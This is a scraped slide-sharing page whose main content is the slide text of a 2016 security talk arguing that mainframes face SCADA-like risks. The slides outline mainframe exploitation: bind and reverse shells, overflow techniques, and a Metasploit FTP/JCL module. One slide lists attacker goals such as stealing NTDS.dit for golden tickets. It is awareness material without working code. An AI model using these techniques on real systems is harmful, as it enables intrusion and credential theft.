Stop expecting magic fairy dust: Make apps secure by designStop expecting magic fairy dust: Make apps secure by design
Stop expecting magic fairy dust: Make apps secure by design
 
Drupal Camp Atlanta 2011 - Drupal Security
Drupal Camp Atlanta 2011 - Drupal SecurityDrupal Camp Atlanta 2011 - Drupal Security
Drupal Camp Atlanta 2011 - Drupal Security
 
How We Learned To Love The Data Center Operating System
How We Learned To Love The Data Center Operating SystemHow We Learned To Love The Data Center Operating System
How We Learned To Love The Data Center Operating System
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVE
 
Drupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityDrupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurity
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summerDEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
 
D1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via smsD1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via sms
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS Firewalls
 
Deep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesDeep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slides
 
Black ops of tcp2005 japan
Black ops of tcp2005 japanBlack ops of tcp2005 japan
Black ops of tcp2005 japan
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
 
Securing Rails
Securing RailsSecuring Rails
Securing Rails
 
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinRv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
 

Recently uploaded

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 

Recently uploaded (20)

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 

A Stuxnet for Mainframes

  • 1. A STUXNET FOR MAINFRAMES
  • 2. Cheryl Biswas • Security researcher/analyst Threat Intel • APTs, Mainframes, ICS SCADA, Shadow IT, StarTrek • BSidesLV, Circle City, BSidesT0, SecTor, Hackfest, TiaraCon • https://whitehatcheryl.wordpress.com • Twitter: @3ncr1pt3d DISCLAIMER: The views represented here are solely her own and not those of her employers, past or present. 11/4/2016@3ncr1pt3d A Stuxnet For Mainframes
  • 3. HEAD IN THE SAND DEFENCE
  • 4. YOU SAY SCADA WE SAY … MAINFRAMES
  • 5. MOM!! THE INTERNET IS BROKEN
  • 6. INTRO In the beginning There were mainframes And it was good.
  • 7. Then came Scada. And it was good too.
  • 11. I CAN’T LIVE ... IF LIVING IS WITHOUT YOU
  • 12.
  • 16. THESE ARE NOT THE MAINFRAMES YOU’RE LOOKING FOR
  • 17. THIS AIN’T YOUR GRANDMA’S MAINFRAME
  • 18. MAINFRAMES - BUILT TO LAST • High Availability • Longevity • Virtualization • The ability to offload to separate engines • Backward compatibility with older software • Massive Throughput https://en.wikipedia.org/wiki/Mainframe_computer
  • 19. @3ncr1pt3d A Stuxnet For Mainframes 11/4/2016
  • 20.
  • 21. SCADA MAINFRAME ❏ Culture ❏ Security Approach ❏ Perceptions ❏ Built to Last ❏ Closed off ❏ Does not play well with others ❏ Culture ❏ Security Approach ❏ Perceptions ❏ Built to Last ❏ Closed off ❏ Does not play well with others
  • 22.
  • 23.
  • 24. Innovation Disruption Would you like some security with that?
  • 25. SECURITY BASICS WE KEEP GETTING WRONG ❏ Passwords ❏ Encryption ❏ Access ❏ Patching http://blog.senr.io/blog/unique-snowfla kes-or-ubiquitous-tech-the-truth-behind -the-industrial-internet-of-things-iiot
  • 26. ICS / SCADA - WHAT HAVE WE LEARNED?
  • 27. "NONE OF OUR SCADA OR ICS EQUIPMENT IS ACCESSIBLE FROM THE INTERNET." O RLY?
  • 29.
  • 30.
  • 31.
  • 36. SCADA - JUMPING AIR GAPS • Designed for underwater communication • Near ultrasonic frequency • Remote key logging for multiple hops http://www.jocm.us/index.php?m=content&c=index&a=show&c atid=124&id=600
  • 37.
  • 38. MAINFRAMES & SCADA - THE LINKS • Similar in Culture • Lack of security • Perceived as secure • “Air Gapped” • “See no evil” – cuz you don’t see it if you aren’t looking
  • 39.
  • 40. BUT IT’S AIR GAPPED “Mainframe modernization or exposing the classic system of record data to new services means that the data is no longer isolated on the mainframe – the world is now “unknown, unknown.” We have lost sight and control of where the data is going the minute we try to harness mainframe data for other purposes than batch or transaction applications.” zOS Expert
  • 41. MAINFRAME - LACK OF ATTACK DATA Because … What you don’t see won’t hurt you
  • 43.
  • 45. MAINFRAME - EXPLOIT RESEARCH Bigendiansmalls https://www.bigendiansmalls.com/category/security/exploit-develop ment/
  • 46. MAINFRAME - NMAP Can now detect Mainframe ports Mainframe banners are not static More accessible to others for hacking http://mainframed767.tumblr.com/post/132669411918/mainframes-a nd-nmap-together-at-last http://mainframed767.tumblr.com/post/47105571997/nmap-script-to -grab-mainframe-screens
  • 47. MAINFRAMES - BIND SHELLCODE Mainframe assembler EBCDIC to ASCII converter Connect with NetCat https://www.bigendiansmalls.com/mainframe-bind-shell-source-code / ASCII TO EBCDIC ASCII TO EBCDIC EBCDIC TO ASCII
  • 49. MAINFRAMES - STACK BUT DIFFERENT ▪Mainframe prologue creates Dynamic Storage Area ▪Points to next free byte on the stack used ▪Does not subtract from ESP to allocate space ▪Register used as a stack pointer ▪Not forced to do so. https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and cease-and-desist-letters-guest-post-2/
  • 50. ALLOCATION OF MEMORY - FUNCTION PROLOGUE 0x8012343 0x8012344 Function Called 0x8012345 - SFP IP EBP MAIN()ESP EBP SFPESP +
  • 51. ALLOCATION MEMORY - FUNCTION PROLOGUE 0x8012345 0x8012344 Function Called IP Allocated Memory EBP -28ESPMAIN() FUNCTIO N() SFPESP +
  • 52. ALLOCATION MEMORY - FUNCTION EPILOGUIE IP EBP MAIN()ESP EBP SFP ESP + SFP
  • 53. ALLOCATION MEMORY - DSA PROLOGUE 0x8012345 0x8012344 Function “Called” IP Dynamic Storage Area MAIN() Pointer to original DS DSA NOT STACK Save Area
  • 54. Not gonna happen HOW TO EXPLOIT - STRING EXPLOITATION != WINAlways aware of length StringStringStringStrin gString Length StringStringStrin gStri Length https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-an d-cease-and-desist-letters-guest-post-2/ AAAAAAAAAA
  • 55. MAINFRAMES - UNIQUE TO EXPLOIT S0C1 Exception http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zo s-le AAAAAAAAAAAAAAA AAAAAA Memory containing Data OPCODES OPCODE does not exist No size checking AAAAA AAA Overflow causes execution to branch to another memory location
  • 56. MAINFRAMES - UNIQUE TO EXPLOIT S0C1 Exception http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zo s-le DSA Level 0 DSA 1 Returns to DS 0 DSA Level 0 DSA 2 DSA Level 1 Register 14 = RP
  • 57. MAINFRAMES - UNIQUE TO EXPLOIT Globally addressed arrays S0C1 Exception http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zo s-le DSA Level 0 DSA 2DSA Level 1 Register 14 = RP DSA 2DSA 1 DSA 3 Procedure returns to Level 1 Actually executes code in DSA2
  • 58. MAINFRAMES - INSECURITY OF MEMORY Memory not more secure than Windows or Unix. No “DEP” No strict ASLR http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zo s-le
  • 61. MAINFRAME - FIRST METASPLOIT MODULE Poorly configured FTP server. FTP -> Shell https://www.bigendiansmalls.com/a-logical-first-step/
  • 62. FTP METASPLOIT MODULE ARCH_CMD Executes a command, or uses a command to give a shell Platform: Mainframe Uses the Mainframe payloads of metasploit Target Automatic Only works with IBM FTP CS V.R. Requires Credentials Credentials allow a file to be uploaded Debugging enabled Can enable Verbose and FTPdebug https://www.bigendiansmalls.com/a-logical-first-step/ https://www.rapid7.com/db/modules/exploit/mainframe/ftp/
  • 63. FTP METASPLOIT MODULE Checks Banner If banner correct, logs in and uploads file File is uploaded as JOB & executes https://www.bigendiansmalls.com/a-logical-first-step/@3ncr1pt3d A Stuxnet For Mainframes 11/4/2016
  • 64. GENERIC JCL TEST FOR MAINFRAME EXPLOITS This can be used as a template for other JCL based payloads https://www.rapid7.com/db/modules/payload/cmd/mainframe/generic_j clhttps://www.bigendiansmalls.com/a-logical-first-step/
  • 65. Z/OS (MVS) COMMAND SHELL, REVERSE TCP Creates a reverse shell.This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically. https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ft p_jcl_creds https://www.bigendiansmalls.com/mainframe-bind-shell-sourc
  • 66. GENERIC COMMAND SHELL Connect back to attacker and spawn a command shell
  • 68. BIGENDIAN POC 11/4/2016@3ncr1pt3d A Stuxnet For Mainframes
  • 70.
  • 71.
  • 72. SCADA - STUXNET • Air Gap bypass • APT • C2 • Self erasing • Specific to system it wants • Nation State
  • 73. SCADA -THE THREAT IS REAL • Dec 2015 Powergrid attack in Ukraine • March 2016 Ransomware hits US power company in Michigan • June 2016 Irongate Targetted ICS malware in testing stage
  • 75. We’re here to say history doesn’t need to repeat itself. Especially not when we know how dire the outcome could be. Scada gives us the lessons we need to learn from and apply to mainframe security. The question now is - will we do it?
  • 76.
  • 77.
  • 78.
  • 79. THE KEYS TO THE KINGDOM ▪ Obtain Domain admin level creds ▪ Gain a copy of NTDS.dit for Kerberos golden tickets to move freely ▪ Identify the back up and recovery systems, including DRP ▪ Identify the critical data and services. Mission critical ▪ Identify messaging servers ▪ Find and compromise application distribution platforms
  • 80.
  • 81.
  • 82. HOW TO GET YOUR FEET WET Researchers to Research • https://www.bigendiansmalls.com/ • http://mainframed767.tumblr.com/ • Mainframe Assembly • locallyhttp://www.cbttape.org/ftp/asmbook/alnv200.pdf
  • 83. HOW TO GET YOUR FEET WET • Virtualization software to play • http://www.bsp-gmbh.com/turnkey/ • http://mvs380.sourceforge.net/ • https://www.tripwire.com/state-of-security/security-data-protection/cyber-secur ity/mainframe-insecuritites-or-hack-the-gibson-no-really/